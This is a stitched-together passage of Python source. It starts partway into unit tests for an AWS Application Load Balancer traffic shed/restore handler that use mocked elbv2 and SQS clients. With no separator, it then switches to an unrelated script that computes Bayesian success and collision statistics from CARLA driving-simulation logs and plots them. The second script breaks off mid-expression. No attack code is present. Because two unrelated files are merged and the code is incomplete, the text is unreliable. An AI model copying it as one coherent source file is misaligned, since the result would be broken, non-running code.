DelaySeconds=self.shed_mesg_delay_sec, MessageBody=json.dumps(message_body)) return def test_handle_alarm_single_shed(self) -> None: alb_alarm_event = ALBAlarmEvent( alarm_event_id='some_id', alarm_arn=self.cw_alarm_arn, alarm_name=self.cw_alarm_name, cw_alarm_state=CWAlarmState.ALARM) sqs_client = MagicMock() elb_shed_percent = 20 max_elb_shed_percent = 10 alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, elb_shed_percent, max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alarm_action = alb_listener_rules_handler.handle_alarm( self.elbv2_client, sqs_client, self.sqs_queue_url, alb_alarm_event) self.assertEqual(alarm_action, ALBAlarmAction.NONE) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 90) self.elbv2_client.modify_rule.assert_called_with( RuleArn=self.elb_listener_rule_arn, Actions=ANY) sqs_client.send_message.assert_not_called() return def test_handle_alarm_other_states(self) -> None: # No other alarm event is expected and thus no actions should be taken alb_alarm_event = ALBAlarmEvent( alarm_event_id='some_id', alarm_arn=self.cw_alarm_arn, alarm_name=self.cw_alarm_name, cw_alarm_state=CWAlarmState.OK) sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) 
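# The 90/10 weight split assigned below puts the listener rule into a
# partially shed state, so although the CloudWatch alarm state in this test
# is OK, handle_alarm is expected to return ALBAlarmAction.RESTORE and to
# queue a RESTORE status message using the restore delay.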
alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn] = 90 alb_listener_rules_handler.elb_rules[0].forward_configs[self.secondary_target_group_arn] = 10 alarm_action = alb_listener_rules_handler.handle_alarm( self.elbv2_client, sqs_client, self.sqs_queue_url, alb_alarm_event) self.assertEqual(alarm_action, ALBAlarmAction.RESTORE) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn], 90) self.elbv2_client.modify_rule.assert_not_called() message_body = { 'albAlarmAction': 'RESTORE', 'alarmArn': alb_alarm_event.alarm_arn, 'alarmName': alb_alarm_event.alarm_name, 'elbListenerArn': self.elb_listener_arn, 'elbShedPercent': self.elb_shed_percent, 'maxElbShedPercent': self.max_elb_shed_percent, 'elbRestorePercent': self.elb_restore_percent, 'loadBalancerArn': self.load_balancer_arn, 'sqsQueueURL': self.sqs_queue_url, 'shedMesgDelaySec': self.shed_mesg_delay_sec, 'restoreMesgDelaySec': self.restore_mesg_delay_sec, 'targetGroupArn': self.target_group_arn } sqs_client.send_message.assert_called_with( QueueUrl=self.sqs_queue_url, DelaySeconds=self.restore_mesg_delay_sec, MessageBody=json.dumps(message_body)) return def test_handle_alarm_status_message_shed(self) -> None: # previous action was SHED and CW alarm state is in ALARM sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn] = 90 alb_listener_rules_handler.elb_rules[0].forward_configs[self.secondary_target_group_arn] = 10 alb_alarm_status_message = ALBAlarmStatusMessage( self.cw_alarm_arn, self.cw_alarm_name, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.sqs_queue_url, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, ALBAlarmAction.SHED ) alarm_action = alb_listener_rules_handler.handle_alarm_status_message( self.cw_client_in_alarm, self.elbv2_client, sqs_client, alb_alarm_status_message) self.assertEqual(alarm_action, ALBAlarmAction.SHED) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 70) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.secondary_target_group_arn), 30) self.elbv2_client.modify_rule.assert_called_with( RuleArn=self.elb_listener_rule_arn, Actions=ANY) message_body = { 'albAlarmAction': 'SHED', 'alarmArn': self.cw_alarm_arn, 'alarmName': self.cw_alarm_name, 'elbListenerArn': self.elb_listener_arn, 'elbShedPercent': self.elb_shed_percent, 'maxElbShedPercent': self.max_elb_shed_percent, 'elbRestorePercent': self.elb_restore_percent, 'loadBalancerArn': self.load_balancer_arn, 'sqsQueueURL': self.sqs_queue_url, 'shedMesgDelaySec': self.shed_mesg_delay_sec, 'restoreMesgDelaySec': self.restore_mesg_delay_sec, 'targetGroupArn': self.target_group_arn } sqs_client.send_message.assert_called_with( QueueUrl=self.sqs_queue_url, DelaySeconds=self.shed_mesg_delay_sec, MessageBody=json.dumps(message_body)) return def test_handle_alarm_status_message_shed_previous_restore(self) -> None: # previous action was RESTORE but CW alarm state is in 
ALARM sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn] = 90 alb_listener_rules_handler.elb_rules[0].forward_configs[self.secondary_target_group_arn] = 10 alb_alarm_status_message = ALBAlarmStatusMessage( self.cw_alarm_arn, self.cw_alarm_name, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.sqs_queue_url, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, ALBAlarmAction.RESTORE ) alarm_action = alb_listener_rules_handler.handle_alarm_status_message( self.cw_client_in_alarm, self.elbv2_client, sqs_client, alb_alarm_status_message) self.assertEqual(alarm_action, ALBAlarmAction.SHED) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 90) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.secondary_target_group_arn), 10) self.elbv2_client.modify_rule.assert_not_called() message_body = { 'albAlarmAction': 'SHED', 'alarmArn': self.cw_alarm_arn, 'alarmName': self.cw_alarm_name, 'elbListenerArn': self.elb_listener_arn, 'elbShedPercent': self.elb_shed_percent, 'maxElbShedPercent': self.max_elb_shed_percent, 'elbRestorePercent': self.elb_restore_percent, 'loadBalancerArn': self.load_balancer_arn, 'sqsQueueURL': self.sqs_queue_url, 'shedMesgDelaySec': self.shed_mesg_delay_sec, 'restoreMesgDelaySec': self.restore_mesg_delay_sec, 'targetGroupArn': self.target_group_arn } sqs_client.send_message.assert_called_with( QueueUrl=self.sqs_queue_url, DelaySeconds=self.shed_mesg_delay_sec, MessageBody=json.dumps(message_body)) return def test_handle_alarm_status_message_restore(self) -> None: # alarm state is OK and previous action was RESTORE sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn] = 80 alb_listener_rules_handler.elb_rules[0].forward_configs[self.secondary_target_group_arn] = 20 alb_alarm_status_message = ALBAlarmStatusMessage( self.cw_alarm_arn, self.cw_alarm_name, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.sqs_queue_url, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, ALBAlarmAction.RESTORE ) alarm_action = alb_listener_rules_handler.handle_alarm_status_message( self.cw_client_ok, self.elbv2_client, sqs_client, alb_alarm_status_message) self.assertEqual(alarm_action, ALBAlarmAction.RESTORE) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 90) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.secondary_target_group_arn), 10) self.elbv2_client.modify_rule.assert_called_with( RuleArn=self.elb_listener_rule_arn, Actions=ANY) message_body = { 
'albAlarmAction': 'RESTORE', 'alarmArn': self.cw_alarm_arn, 'alarmName': self.cw_alarm_name, 'elbListenerArn': self.elb_listener_arn, 'elbShedPercent': self.elb_shed_percent, 'maxElbShedPercent': self.max_elb_shed_percent, 'elbRestorePercent': self.elb_restore_percent, 'loadBalancerArn': self.load_balancer_arn, 'sqsQueueURL': self.sqs_queue_url, 'shedMesgDelaySec': self.shed_mesg_delay_sec, 'restoreMesgDelaySec': self.restore_mesg_delay_sec, 'targetGroupArn': self.target_group_arn } sqs_client.send_message.assert_called_with( QueueUrl=self.sqs_queue_url, DelaySeconds=self.restore_mesg_delay_sec, MessageBody=json.dumps(message_body)) return def test_handle_alarm_status_message_restore_previous_shed(self) -> None: # alarm state is OK and previous action was SHED sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn] = 80 alb_listener_rules_handler.elb_rules[0].forward_configs[self.secondary_target_group_arn] = 20 alb_alarm_status_message = ALBAlarmStatusMessage( self.cw_alarm_arn, self.cw_alarm_name, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.sqs_queue_url, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, ALBAlarmAction.SHED ) alarm_action = alb_listener_rules_handler.handle_alarm_status_message( self.cw_client_ok, self.elbv2_client, sqs_client, alb_alarm_status_message) self.assertEqual(alarm_action, ALBAlarmAction.RESTORE) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 80) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.secondary_target_group_arn), 20) self.elbv2_client.modify_rule.assert_not_called() message_body = { 'albAlarmAction': 'RESTORE', 'alarmArn': self.cw_alarm_arn, 'alarmName': self.cw_alarm_name, 'elbListenerArn': self.elb_listener_arn, 'elbShedPercent': self.elb_shed_percent, 'maxElbShedPercent': self.max_elb_shed_percent, 'elbRestorePercent': self.elb_restore_percent, 'loadBalancerArn': self.load_balancer_arn, 'sqsQueueURL': self.sqs_queue_url, 'shedMesgDelaySec': self.shed_mesg_delay_sec, 'restoreMesgDelaySec': self.restore_mesg_delay_sec, 'targetGroupArn': self.target_group_arn } sqs_client.send_message.assert_called_with( QueueUrl=self.sqs_queue_url, DelaySeconds=self.restore_mesg_delay_sec, MessageBody=json.dumps(message_body)) return def test_handle_alarm_status_message_restore_no_remaining_restore(self) -> None: # alarm state is OK and previous action was RESTORE. 
# no more loan remains to be restored sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn] = 90 alb_listener_rules_handler.elb_rules[0].forward_configs[self.secondary_target_group_arn] = 10 alb_alarm_status_message = ALBAlarmStatusMessage( self.cw_alarm_arn, self.cw_alarm_name, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.sqs_queue_url, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, ALBAlarmAction.RESTORE ) alarm_action = alb_listener_rules_handler.handle_alarm_status_message( self.cw_client_ok, self.elbv2_client, sqs_client, alb_alarm_status_message) self.assertEqual(alarm_action, ALBAlarmAction.NONE) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 100) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.secondary_target_group_arn), 0) self.elbv2_client.modify_rule.assert_called_with( RuleArn=self.elb_listener_rule_arn, Actions=ANY) sqs_client.send_message.assert_not_called() return import numpy as np import csv import matplotlib.pyplot as plt from matplotlib import rc rc('text', usetex=True) from scipy.special import gamma as scigamma from scipy.special import gammaln as scigammaln from collections import OrderedDict def split_into_tasks(reader): out = list() tmp = OrderedDict() last_weather = -1 last_start = -1 last_end = -1 for row in reader: weather = row['weather'] startp = row['start_point'] endp = row['end_point'] if weather != last_weather or startp != last_start or endp != last_end: # Add new task if tmp: out.append(tmp) tmp = OrderedDict() last_weather = weather last_start = startp last_end = endp if tmp: for key in row: tmp[key].append(float(row[key])) else: for key in row: tmp[key] = [float(row[key])] # tmp.update(row) if tmp: out.append(tmp) return out def get_total_distance_of_tasks(task_data): distance = list() for task in task_data: x_diff = np.diff(task['pos_x']) y_diff = np.diff(task['pos_y']) acc_dist = np.cumsum(np.sqrt(x_diff ** 2 + y_diff ** 2)) distance.append(acc_dist[-1]) return np.asarray(distance) def get_successful_tasks(task_data, key): successes = list() for task in task_data: data = np.asarray(task[key]) if np.any(data > 0): successes.append(False) else: successes.append(True) return np.asarray(successes) def get_distance_between_infractions(task_data, key): distances = list() acc_dist = 0 for task in task_data: data = np.array(task[key]) x_diff = np.diff(task['pos_x']) y_diff = np.diff(task['pos_y']) distance = np.cumsum(np.sqrt(x_diff ** 2 + y_diff ** 2)) if not np.any(data > 0): # Accumulate distance between tasks acc_dist += distance[-1] continue indices = np.flatnonzero(data) distances.append(acc_dist + distance[indices[0] - 1]) # Reset accumulated distance for next infraction acc_dist = 0 if not distances: distances.append(acc_dist) return np.asarray(distances) def get_distance_to_first_infraction(task_data, key): distances = list() for task in task_data: data = np.array(task[key]) if not np.any(data > 0): continue x_diff = np.diff(task['pos_x']) y_diff = 
np.diff(task['pos_y']) distance = np.cumsum(np.sqrt(x_diff**2 + y_diff**2)) indices = np.flatnonzero(data) distances.append(distance[indices[0]-1]) return np.asarray(distances) def get_percentage_under_infraction(task_data, key, threshold): percentages = list() if type(key) != list: key = [key] for task in task_data: data = list() for k in key: data.append(np.asarray(task[k])) data = np.asarray(data) infractions = data > threshold infractions = np.logical_or.reduce(infractions) percentages.append(np.sum(infractions) / data.shape[1]) return np.asarray(percentages) def get_hist_of_infractions(task_data, nbins=100): data_offroad = [] data_otherside = [] for task in task_data: data_offroad += task['intersection_offroad'] data_otherside += task['intersection_otherlane'] data_offroad = np.asarray(data_offroad) data_otherside = np.asarray(data_otherside) data = np.concatenate((data_offroad, -data_otherside)) hist = np.histogram(data, bins=nbins, range=(-1, 1)) return data def estimate_binomial_distribution(success_statuses): s = np.sum(success_statuses) f = len(success_statuses) - s return s, f def estimate_beta_distribution(distances): dist = np.array(distances, dtype=np.float) x = np.mean(dist) v = np.var(dist) alpha = x * (x*(1-x) / v - 1) beta = (1 - x) * (x*(1-x) / v - 1) return alpha, beta def get_pdf_beta_posterior(s, f, prior='jeffreys'): x = np.linspace(0.05, 0.95, 100) if prior == 'bayes': pdf = (x**s * (1-x)**f) * scigamma(s + f + 2) / (scigamma(s + 1) * scigamma(f + 1)) elif prior == 'jeffreys': pdf = (x ** (s-0.5) * (1 - x) ** (f-0.5)) * scigamma(s + f + 1) / (scigamma(s + 0.5) * scigamma(f + 0.5)) return pdf, x def get_pdf_beta_posterior_in_logarithm(s, f, prior='jeffreys'): x = np.linspace(0.001, 0.999, 1000) lx= np.log(x) lnx = np.log(1-x) if prior == 'jeffreys': lpdf = (s-0.5)*lx + (f-0.5)*lnx + scigammaln(s + f + 1) - scigammaln(s + 0.5) - scigammaln(f + 0.5) return np.exp(lpdf), x def get_pdf_for_infractions(filename): with open(filename, newline='') as csvfile: reader = csv.DictReader(csvfile) # Split measurments into tasks tasks = split_into_tasks(reader) infr_dists_other = get_distance_between_infractions(tasks, 'collision_other') infr_dists_pedestrian = get_distance_between_infractions(tasks, 'collision_pedestrians') infr_dists_vehicle = get_distance_between_infractions(tasks, 'collision_vehicles') # Estimate for accidents gamma_distr = list() # Estimate for accidents exp_distr = list() # Estimate for percentage of non-collision successes_other = get_successful_tasks(tasks, 'collision_other') successes_pedestrians = get_successful_tasks(tasks, 'collision_pedestrians') successes_vehicles = get_successful_tasks(tasks, 'collision_vehicles') beta_distr = list() s, f = estimate_binomial_distribution(successes_other) pdf, x = get_pdf_beta_posterior_in_logarithm(s, f) coll_free = {'s': s, 'f': f} beta_distr.append({'pdf': pdf, 'params': (s, f)}) s, f = estimate_binomial_distribution(successes_pedestrians) pdf, x = get_pdf_beta_posterior_in_logarithm(s, f) beta_distr.append({'pdf': pdf, 'params': (s, f)}) s, f = estimate_binomial_distribution(successes_vehicles) pdf, x = get_pdf_beta_posterior_in_logarithm(s, f) beta_distr.append({'pdf': pdf, 'params': (s, f)}) beta_x = x return exp_distr, gamma_distr, beta_distr, tasks, exp_x, gamma_x, beta_x, coll_free def get_success_status(filename): success = list() with open(filename, newline='') as csvfile: reader = csv.DictReader(csvfile) for line in reader: reached_goal = int(line['result']) success.append(reached_goal == 1) return success 
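# Illustrative sketch (added for clarity, not part of the original analysis):
# the log-space helper above evaluates a Beta(s + 0.5, f + 0.5) posterior,
# i.e. a Jeffreys prior updated with s successes and f failures, so its peak
# should sit near the Beta mode (s - 0.5) / (s + f - 1). The counts used here
# are hypothetical and the helper name is new.
def _example_jeffreys_posterior_peak():
    pdf, x = get_pdf_beta_posterior_in_logarithm(18, 2)
    # For s=18, f=2 the mode is 17.5 / 19, roughly 0.92; the argmax over the
    # evaluation grid should land close to that value.
    return x[np.argmax(pdf)]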
def calculate_KL_divergence_exponential(lambda1, lambda2): """ Calculates distance from true distribution to approximate distribution Args: lambda1: "True" distribution lambda2: "Approximate" distribution Returns: KL divergence """ return np.log(lambda1) - np.log(lambda2) + lambda2 / lambda1 - 1 def sample_from_exponential_bayesian(data, a=1, b=1, nsamples=100): dist = np.asarray(data) xbar = np.mean(dist) n = len(dist) ls = np.random.gamma(a+n, 1/(b+n*xbar), nsamples) for l in ls: cdf, x = get_cdf_exponential(l) plt.plot(x, cdf) plt.show() if __name__ == '__main__': #np.seterr(all='raise') # Metrics for GT models exp_distr = {} gamma_distr = {} beta_distr = {} task_data = {} exp_x = {} gamma_x = {} beta_x = {} results = {} beta_success = {} beta_success_x = {} folder_names = {} beta_success_acc = {} beta_coll_acc = {} keys = ['setting'] for k in keys: exp_distr[k] = list() gamma_distr[k] = list() beta_distr[k] = list() task_data[k] = list() exp_x[k] = list() gamma_x[k] = list() beta_x[k] = list() results[k] = list() beta_success[k] = list() beta_success_x[k] = list() folder_names[k] = list() beta_success_acc[k] = list() beta_coll_acc[k] = list() base_name = {'setting': 'path/to/carla_results_folder'} nums = {'setting': None} for key in base_name: if nums[key] is not None: for n in nums[key]: folder_names[key].append(base_name[key] + '{}'.format(n)) else: folder_names[key].append(base_name[key]) for key in folder_names: s_acc_goal = 0 f_acc_goal = 0 s_acc_coll = 0 f_acc_coll = 0 for folder in folder_names[key]: exp_distr1, gamma_distr1, beta_distr1, task_data1, exp_x1, gamma_x1, beta_x1, coll_free = get_pdf_for_infractions( folder + '/measurements.csv') reached_goal = get_success_status(folder + '/summary.csv') exp_distr[key].append(exp_distr1) gamma_distr[key].append(gamma_distr1) beta_distr[key].append(beta_distr1) task_data[key].append(task_data1) exp_x[key].append(exp_x1) gamma_x[key].append(gamma_x1) beta_x[key].append(beta_x1) results[key].append(reached_goal) s, f = estimate_binomial_distribution(reached_goal) #pdf, x = get_pdf_beta_posterior(s, f) pdf, x = get_pdf_beta_posterior_in_logarithm(s, f) beta_success[key].append(pdf) beta_success_x[key].append(x) s_acc_goal += s f_acc_goal += f s_acc_coll += coll_free['s'] f_acc_coll += coll_free['f'] if len(folder_names[key]) > 1: pdf, x = get_pdf_beta_posterior_in_logarithm(s_acc_goal, f_acc_goal) beta_success_acc[key] = {'pdf': pdf, 'x': x} pdf, x = get_pdf_beta_posterior_in_logarithm(s_acc_coll, f_acc_coll) beta_coll_acc[key] = {'pdf': pdf, 'x': x} # Estimate a ranking of the models offroad_percentage = {} otherlane_percentage = {} combined_percentage = {} distance = {} accomplished_tasks = {} collisionfree_tasks = {} score = {} best_idx = {} worst_idx = {} median_idx = {} for k in keys: offroad_percentage[k] = {"mean": -1, "median": -1, "best": -1, "worst": -1, "all": list()} otherlane_percentage[k] = {"mean": -1, "median": -1, "best": -1, "worst": -1, "all": list()} combined_percentage[k] = {"mean": -1, "median": -1, "best": -1, "worst": -1, "all": list()} distance[k] = {"mean": -1, "median": -1, "best": -1, "worst": -1, "all": list()} accomplished_tasks[k] = {"mean": -1, "median": -1, "best": -1, "worst": -1, "all": list()} collisionfree_tasks[k] = {"mean": -1, "median": -1, "best": -1, "worst": -1, "all": list()} score[k] = list() best_idx[k] = -1 worst_idx[k] = -1 median_idx[k] = -1 for key in keys: total_dist = 0. 
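# The threshold assigned below is handed to get_percentage_under_infraction:
# a timestep counts as an infraction when its intersection_offroad /
# intersection_otherlane measurement exceeds this fraction, and the reported
# value is the share of timesteps above that threshold.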
percentage_for_infraction = 0.2 for i, (task, beta_d, reached_goal) in enumerate(zip(task_data[key], beta_distr[key], results[key])): offroad_percentage[key]["all"].append(100. * np.mean(get_percentage_under_infraction(task, 'intersection_offroad', percentage_for_infraction))) otherlane_percentage[key]["all"].append(100. * np.mean(get_percentage_under_infraction(task, 'intersection_otherlane', percentage_for_infraction))) combined_percentage[key]["all"].append(100. * np.mean(get_percentage_under_infraction(task, ['intersection_offroad', 'intersection_otherlane'], percentage_for_infraction))) distance[key]["all"].append(np.sum(get_total_distance_of_tasks(task))) s, fails = beta_d[0]['params'] collisionfree_tasks[key]["all"].append( 100. * s / (s + fails) ) res = np.sum(reached_goal) accomplished_tasks[key]["all"].append(100 * res / len(reached_goal)) score[key].append((100. - combined_percentage[key]["all"][-1] + collisionfree_tasks[key]["all"][-1] + accomplished_tasks[key]["all"][-1])/300) scores = np.asarray(score[key]) best_idx[key] = np.argmax(scores) worst_idx[key] = np.argmin(scores) median_idx[key] = np.argmax(np.median(scores) == scores) offroad_percentage[key]["best"] = offroad_percentage[key]["all"][best_idx[key]] offroad_percentage[key]["worst"] = offroad_percentage[key]["all"][worst_idx[key]] offroad_percentage[key]["median"] = np.median(offroad_percentage[key]["all"]) #[median_idx[key]] offroad_percentage[key]["mean"] = np.mean(offroad_percentage[key]["all"]) otherlane_percentage[key]["best"] = otherlane_percentage[key]["all"][best_idx[key]] otherlane_percentage[key]["worst"] = otherlane_percentage[key]["all"][worst_idx[key]] otherlane_percentage[key]["median"] = np.median(otherlane_percentage[key]["all"]) # [median_idx[key]] otherlane_percentage[key]["mean"] = np.mean(otherlane_percentage[key]["all"]) combined_percentage[key]["best"] = combined_percentage[key]["all"][best_idx[key]] combined_percentage[key]["worst"] = combined_percentage[key]["all"][worst_idx[key]] combined_percentage[key]["median"] = np.median(combined_percentage[key]["all"]) # [median_idx[key]] combined_percentage[key]["mean"] = np.mean(combined_percentage[key]["all"]) accomplished_tasks[key]["best"] = accomplished_tasks[key]["all"][best_idx[key]] accomplished_tasks[key]["worst"] = accomplished_tasks[key]["all"][worst_idx[key]] accomplished_tasks[key]["median"] = np.median(accomplished_tasks[key]["all"]) # [median_idx[key]] accomplished_tasks[key]["mean"] = np.mean(accomplished_tasks[key]["all"]) collisionfree_tasks[key]["best"] = collisionfree_tasks[key]["all"][best_idx[key]] collisionfree_tasks[key]["worst"] = collisionfree_tasks[key]["all"][worst_idx[key]] collisionfree_tasks[key]["median"] = np.median(collisionfree_tasks[key]["all"]) # [median_idx[key]] collisionfree_tasks[key]["mean"] = np.mean(collisionfree_tasks[key]["all"]) distance[key]["best"] = distance[key]["all"][best_idx[key]] distance[key]["worst"] = distance[key]["all"][worst_idx[key]] distance[key]["median"] = np.median(distance[key]["all"]) # [median_idx[key]] distance[key]["mean"] = np.mean(distance[key]["all"]) colours = ['cyan', 'brown', 'purple', 'red', 'blue', 'green'] for i, key in enumerate(keys): plt.plot(beta_x[key][best_idx[key]], beta_distr[key][best_idx[key]][0]['pdf'], label=key, lw=3, color=colours[i]) import matplotlib.patches as mpatches red_patch = mpatches.Patch(color='red', label='T*D*') purple_patch = mpatches.Patch(color='blue', label='RL') brown_path = mpatches.Patch(color='green', label='IL') 
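# The curves plotted in the loop above are the posteriors over the
# collision-free probability for the best-scoring run of each setting; the
# patches defined here only supply the custom legend labels (T*D*, RL, IL)
# used in the figure.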
plt.legend(handles=[red_patch, purple_patch, brown_path], loc='upper left', fontsize=24) plt.ylim([0, 30]) plt.xlim([0, 1]) plt.yticks([]) plt.xticks([0, 0.25, 0.5, 0.75, 1.0], ['0\%', '25\%', '50\%', '75\%', '100\%'], fontsize=28) plt.ylabel(r'$P(p_{\neg Collision} = x\%)$', fontsize=30) plt.show() for i, key in enumerate(keys): plt.plot(beta_success_x[key][best_idx[key]], beta_success[key][best_idx[key]], label=key, lw=3, color=colours[i]) plt.legend(handles=[red_patch, purple_patch, brown_path], loc='upper left', fontsize=24) plt.ylim([0, 30]) plt.xlim([0, 1]) plt.yticks([]) plt.xticks([0, 0.25, 0.5, 0.75, 1.0], ['0\%', '25\%', '50\%', '75\%', '100\%'], fontsize=28) plt.ylabel(r'$P(p_{Success} = x\%)$', fontsize=30) plt.subplots_adjust(hspace=0.05, wspace=0) plt.show() # Plot the success rate for all models in a specific training condition blue_patch = mpatches.Patch(color='blue', label='TGDG') orange_patch = mpatches.Patch(color='orange', label='TGDE') green_patch = mpatches.Patch(color='green', label='TEDE') red_patch = mpatches.Patch(color='red', label='TEDG') for i, key in enumerate(keys): if beta_success_acc[key]: plt.plot(beta_success_acc[key]['x'], beta_success_acc[key]['pdf'], label=key, lw=3) plt.legend(handles=[blue_patch, orange_patch, green_patch, red_patch], loc='upper left', fontsize=20) plt.ylim([0, 45]) plt.xlim([0, 1]) plt.yticks([]) plt.xticks([0, 0.25, 0.5, 0.75, 1.0], ['0\%', '25\%', '50\%', '75\%', '100\%'], fontsize=28) plt.ylabel(r'$P(p_{Success} = x\%)$', fontsize=30) plt.savefig('results/betaSuccessTot.pdf', bbox_inches='tight') plt.show() # Plot the success rate for all models in a specific training condition for i, key in enumerate(keys): if beta_coll_acc[key]: plt.plot(beta_coll_acc[key]['x'], beta_coll_acc[key]['pdf'], label=key, lw=3) plt.legend(handles=[blue_patch, orange_patch, green_patch, red_patch], loc='upper left', fontsize=20) plt.ylim([0, 30]) plt.xlim([0, 1]) plt.yticks([]) plt.xticks([0, 0.25, 0.5, 0.75, 1.0], ['0\%', '25\%', '50\%', '75\%', '100\%'], fontsize=28) plt.ylabel(r'$P(p_{\neg Collision} = x\%)$', fontsize=30) plt.savefig('results/betaCollTot.pdf', bbox_inches='tight') plt.show() # Plotting histogram for out-of-road fig = plt.figure() nfigs = len(task_data) nbins = 13 for j, key in enumerate(keys): nmodels = 1 # len(task_data[key]) td = task_data[key][best_idx[key]] plt.subplot(nfigs, 1, j+1) hist_data = get_hist_of_infractions(td) plt.hist2d(hist_data, np.zeros_like(hist_data), bins=[nbins, 1], range=[[-1, 1], [0, 0]], normed=True) plt.yticks([]) #np.arange(0, nmodels), fontsize=14) plt.ylabel(key, fontsize=14) plt.ylim([-0.5, nmodels - 0.5]) plt.xticks([]) ax = plt.gca() ax.set_xticks(np.linspace(-1, 1, nbins+1), minor=True) ax.set_yticks(np.arange(-0.5, nmodels - 0.5, 1), minor=True) plt.grid(which='minor', lw=0.5, c='k') plt.xticks([-1., -0.5, 0., 0.5, 1.], ['100\%', '50\%', '0\%', '50\%', '100\%'], fontsize=28) fig.subplots_adjust(hspace=0.05, wspace=0) plt.show() # Plotting histogram for out-of-road for each model set fig = plt.figure() nfigs = len(task_data) nbins = 13 for j, key in enumerate(keys): nmodels = 1 # len(task_data[key]) hist_data = np.zeros(nbins) for td in task_data[key]: hist_data = np.concatenate((hist_data,get_hist_of_infractions(td))) plt.subplot(nfigs, 1, j + 1) plt.hist2d(hist_data, np.zeros_like(hist_data), bins=[nbins, 1], range=[[-1, 1], [0, 0]], normed=True) plt.yticks([]) plt.ylabel(key, fontsize=14) plt.ylim([-0.5, nmodels - 0.5]) plt.xticks([]) ax = plt.gca() ax.set_xticks(np.linspace(-1, 1, nbins + 
